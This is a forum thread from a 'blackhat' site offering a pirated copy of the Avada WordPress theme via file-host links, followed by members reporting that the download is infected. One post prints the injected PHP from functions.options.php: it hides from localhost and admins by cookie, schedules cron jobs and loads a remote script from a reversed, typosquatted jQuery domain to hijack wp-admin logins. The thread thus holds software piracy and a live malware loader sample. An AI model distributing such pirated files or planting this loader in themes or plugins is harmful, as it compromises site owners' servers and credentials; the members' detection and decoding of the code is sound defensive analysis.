Best Blackhat Forum

Pages: 1 2

[Image: Avada-v3-7-3-responsive-multi-purpose-th...forest.jpg]

Avada v3.8.2 Responsive Multi-Purpose Theme [Themeforest] 22.19MB

Avada is the ultimate multi-purpose WordPress theme. It is clean, super flexible, responsive, includes Fusion Page Builder and comes packed with powerful options! This multi-purpose WordPress theme sets the new standard with endless possibilities, top-notch support, and lifetime updates with newly requested features from our users.

- new option to disable custom post type name in breadcrumbs
- made LESS compiler into a theme option that is disabled by default. This fixes the issues of mysql crashing on certain server environments
- fixed fusion slider issue of width/height import and slide animation
- added back the .mo files in language folder for main package
- sticky header logo will now auto resize to fit area
- icons in main menu will align with menu text
- fixed issue of double menus when using side header
- fixed ubermenu compatibility issues
- fixed language issue with new Facebook widget
- portfolio grid images / layout will display correctly
- getimagesize loop issue is fixed, retina logo dimensions are now required
- fixed ilightbox s error when the URL param is not set
- fixed issue of button color when using tagline box

Product page
Download Links

http://www67.zippyshare.com/v/GilgWvQL/file.html
http://mir.cr/08P34FUD
https://www.sendspace.com/file/z2omdv
http://www.solidfiles.com/d/43b2c7b739/
http://[Reported by Members as premium hosting that SUCK! Use MEDIAFIRE or MEGA.NZ :) !!!].net/file/ea33fe5dff9b7aad4327adac73c1591d/Avada382.zip.html

Code:

https://www.virustotal.com/file/0b0d6c28bf64217a547e9d9b07a2781a009c6320b05f0877b9daaa8d52d18219/analysis/1429089982/

Any threat ???

Virus: Qihoo-360 exp.htm.expack.db
https://www.virustotal.com/en/file/ae955.../analysis/

So, are theese file infected?

all his files are infected

Installed on my server, so far working greatly !!!

(04-15-2015 08:49 PM)ghanchi2000 Wrote: [ -> ]Any threat ???

Virus: Qihoo-360 exp.htm.expack.db
https://www.virustotal.com/en/file/ae955.../analysis/

That is from .db files i guess , but otherwise the theme has been taken from themeforest (minus PSD files since those are big and you can also get them from previous posts )..

INFECTED functions.options.php starting from line 6578

if (!function_exists('enqueue_my_script')) {
if (!in_array($_SERVER['REMOTE_ADDR'], array('127.0.0.1', '::1'))) {
if (!isset($_COOKIE['wp_iz_admin'])) {
add_action('login_enqueue_scripts', 'enqueue_my_script');
}
add_action('admin_init', 'cliv_create_recurring_schedule');
add_action('cliv_recurring_cron_job', 'cliv_recurring_cron_function');
add_action('wp_login', 'wp_setcookies');
}
function enqueue_my_script()
{
$domainis = strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');
wp_enqueue_script('my-scripters', $domainis, null, null, true);
}

avada 3.82 is some hours old and you spread infected files ?? ....thats shit men

exp.htm.expack.db ist nothing ...false alarm ..i have the original 3.82 ..its the same
i have tested it

but this guy docadvocate seems to infect this files like bale says ...do not trust him. ...this script seems to take over the wp-admin login

Docadvocate this is not clean code that was downloaded from themeforest. In all the versions 3.8. 3.8.1, and 3.8.2 you have posted in the past 24 hours all have the same infection that Bale posted and it seems he has posted other plugins and scripts here that have the same infections that others have found.
$domainis = strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');

Reverse that and you get code.jqeury.org/jquery-latest.js

That goes to a rogue site and not the official jquery site, noticed how the e and u are swapped in the domain.

Pages: 1 2

docadvocate

ghanchi2000

maple

bale

ghanchi2000

docadvocate

bale

MisterXX2

MisterXX2

storm180